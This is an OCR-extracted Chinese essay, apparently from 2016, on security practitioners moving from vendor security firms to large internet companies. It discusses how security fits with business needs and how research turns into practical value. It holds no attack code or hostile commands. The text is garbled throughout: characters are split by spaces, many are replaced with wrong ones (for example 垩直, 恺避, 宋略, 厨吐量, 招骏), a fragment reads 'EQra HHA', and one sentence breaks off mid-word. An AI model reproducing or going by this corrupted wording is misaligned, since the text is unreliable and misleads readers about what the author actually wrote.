1) 从 传统 的 乙方 专业 安全 公司 到 大 型 互联 网 甲 方 的 视角 转换 问 


2) 纯 安 全 技术 和 业务 的 结合 点 。 


3) 安全 研究 如 何 转 化 为 实际 的 价值 。 








乙方 安全 公司 是 甲 方 获 取 安 全 人 才 的 重要 渠道 ， 主 要 基于 他 们 在 安 
全 垩 直 领 域 的 积 系 ， 但 不 同 之 处 是 甲 方 和 乙方 思路 、 方 法 论 、KPI 导 问 
都 存在 较 大 差异 。 现 在 的 市 场 已 经 不 是 过 去 乙方 明显 强 于 甲 方 的 时 代 ， 
如 果 带 着 原 来 乙方 的 交付 思路 和 做 事 风 格 去 直接 落地 ， 恺 避 是 没 法 软 着 
陆 的 。 乙 方 往往 追求 的 是 通用 型 的 解决 方案 ， 广 而 不 深 ， 重 于 安全 而 轻 
于 业务 ， 为 了 交付 验 收 更 多 地 追求 可 用 性 而 不 是 检 出 率 ， 为 了 避免 线 上 
系统 的 变更 风险 很 多 有 实际 意义 的 功能 不 会 开局 ， 而 甲 方 退 求 的 是 最 
终 “ 能 睡 好 觉 ”， 更 看 重 结果 ， 看 重 对 业务 面 的 影响 。 即 便 是 去 < 忽悠 ”， 
甲 方 和 乙方 安全 工作 者 忽悠 的 方式 也 是 完全 不 同 的 。 



































乙方 眼中 的 安全 体系 虽然 比较 系统 ， 但 更 多 是 基于 咨询 视角 ， 不 是 
由 甲 方 的 实际 业务 场景 抽象 而 来 的 ， 如 果 拿 乙方 的 模型 直接 去 套 甲 方 现 
实 中 的 工作 ， 可 能 在 安全 工作 的 “分 类 ”和 “比重 ”两 个 层面 都 无 法 一 一 对 
应 。 








乙方 解决 方案 更 多 的 体现 为 理论 上 可 行 ， 而 不 是 实 操 上 可 行 。 在 互 
联网 行业 ， 理 论 上 可 行 的 方案 如 何 转化 为 有 性 价 比 的 、 可 实现 的 安全 方 
案 需要 在 各 种 维度 进行 考量 ， 而 不 是 在 网 关上 放 一 个 硬件 盒子 或 改 一 行 
代码 那么 人 简单。 乙方 眼中 的 正确 解 不 一 定 是 甲 方 眼中 的 合理 解 ， 是 否 正 
确 合理 并 不 是 简单 的 由 “是 否 能 修补 漏洞 本 里 ”这 个 命题 决定 的 ， 而 需要 
综合 考虑 以 下 问题 : 对 现 有 系统 的 改动 成 本 ， 对 架构 的 变更 影响 ， 与 现 
有 安全 系统 的 结合 程度 ， 以 后 对 同类 问题 解决 的 扩展 性 等 。 














传统 的 建设 思路 和 互联 网 行业 也 风格 授 异 。 单 点 型 安全 措施 如 何 转 
化 为 系统 化 、 平 台 化 的 、 治 本 型 的 防御 手段 需要 建立 在 了 解 具 体 的 业务 
类 型 之 上 ， 中 高 端 职位 的 招聘 要 求 上 往往 都 有 一 条 叫做 “沟通 能 力 - 推 动 
安全 宋 略 落地 >”， 那 到 底 什 么 样 的 人 才 有 真正 的 推动 能 力 ? EQra HHA 
际 关 系 算 ? 笔者 认为 这 只 是 野 路 子 的 一 个 分 支 云 了， 并 不 是 真正 意义 上 
能 力 ， 能 上 得 了 厅 符 的 推动 能 力 是 你 很 熟悉 互联 网 公司 的 运 维和 开发 ， 
熟悉 所 有 场景 的 风险 缓解 措施 对 业务 面 的 影响 ， 并 且 知 道 当 安全 给 运 维 
和 开发 带 来 阻碍 时 ， 运 维和 开发 在 新 的 安全 机 制 下 对 应 的 自我 改善 措施 
征 什 么 ， 在 推动 安全 策略 时 就 能 无 往 而 不 利 。 比 如 当 安 全 拦截 设备 降低 
系统 的 并 发 能 力 的 时 候 ， 你 了 解 哪些 是 比 影响 到 用 户 的 每 个 请 求 应 答 时 
长 难以 改善 的 ， 哪 些 是 厨 吐 量 可 以 通过 堆 机 制 改善 并 发 用 户 总 容量 的 ， 
如 果 你 只 有 一 个 解 ， 往 往 相 当 于 给 运 维 和 开发 出 了 没有 选择 的 难题 ， 而 
你 又 不 能 提供 对 应 的 解决 方案 ， 那 结果 目 然 是 僵持 不 下 。 

















乙方 的 同学 如 果 想 在 甲 方 平 滑 过 渡 ， 殉 需要 学 习 上 述 各 种 能 力 ， 同 
样 ， 甲 方 的 同学 也 应 根据 乙方 同学 的 特点 为 他 们 寻找 更 好 的 环境 适应 渠 











在 安全 大 会 和 媒体 上 曝光 量 最 多 的 是 安全 漏洞 和 单 点 型 安全 新 技 
术 ， 从 互联 网 营销 的 角度 ， 没 有 任何 专业 知识 的 普通 网 民 可 以 把 网 络 安 
全 等 价 于 “黑客 ”漏洞 ”等 车 眼球 的 名 词 ， 但 对 安全 从 业者 来 说 却 不 是 。 
站 在 镁 光 灯 下 炫 技 的 技术 跟 现实 环境 中 的 安全 设计 之 间 是 存在 较 大 鸿沟 
的 。 尽 管 从 历史 上 来 看 是 攻击 技术 促进 了 防御 技术 的 发 展 ， 但 一 个 很 现 
实 的 问题 是 实际 上 大 多 数 人 都 是 安全 工作 者 ， 而 非 职业 入 侵 者 ， 所 以 研 
究 的 成 果 如 何 转化 是 很 有 挑战 的 问题 ， 例 如 Google 的 3 篇 map-reduce、 
bigtable、GFS 论 文 带动 了 整个 行业 的 技术 发 展 ， 安 全 方面 也 开源 了 
Native Client 沙 箱 (Google 的 一 个 sandbox 项 目 ) 这样 的 项 目 ， 国 内 的 安 
全 研究 者 是 否 也 能 往 这 个 方向 稍微 转 一 转 : 提出 问题 ， 同 时 提供 一 个 更 
好 的 解决 方案 。 从 利益 的 角度 看 ， 一 个 好 的 解决 方案 往往 是 一 个 商机 。 














在 大 型 企业 ， 安 全 研究 应 该 如 何 贴近 业务 产生 价值 是 一 个 系统 性 方 
法 论 ， 笔 者 会 在 技术 博客 中 专门 讨论 这 一 话题 。 











2016 年 是 安全 从 业 环 境 继 续 火 热 的 一 年 ， 公 司 高 层 对 招募 高 问安 全 
人 才 的 价值 ， 安 全 圈 内 的 大 佬 们 对 安全 工作 价值 的 定位 和 认 知 ， 广 大 从 
业者 对 自己 的 定位 和 发 展 方 辐 部 会 在 意识 形态 上 产生 新 一 轮 大 清洗 。 在 
企业 内 部 如 何 消 化 并 用 好 已 经 招 骏 的 安全 人 才 也 是 对 管理 者 很 有 挑战 的 














问题 。 


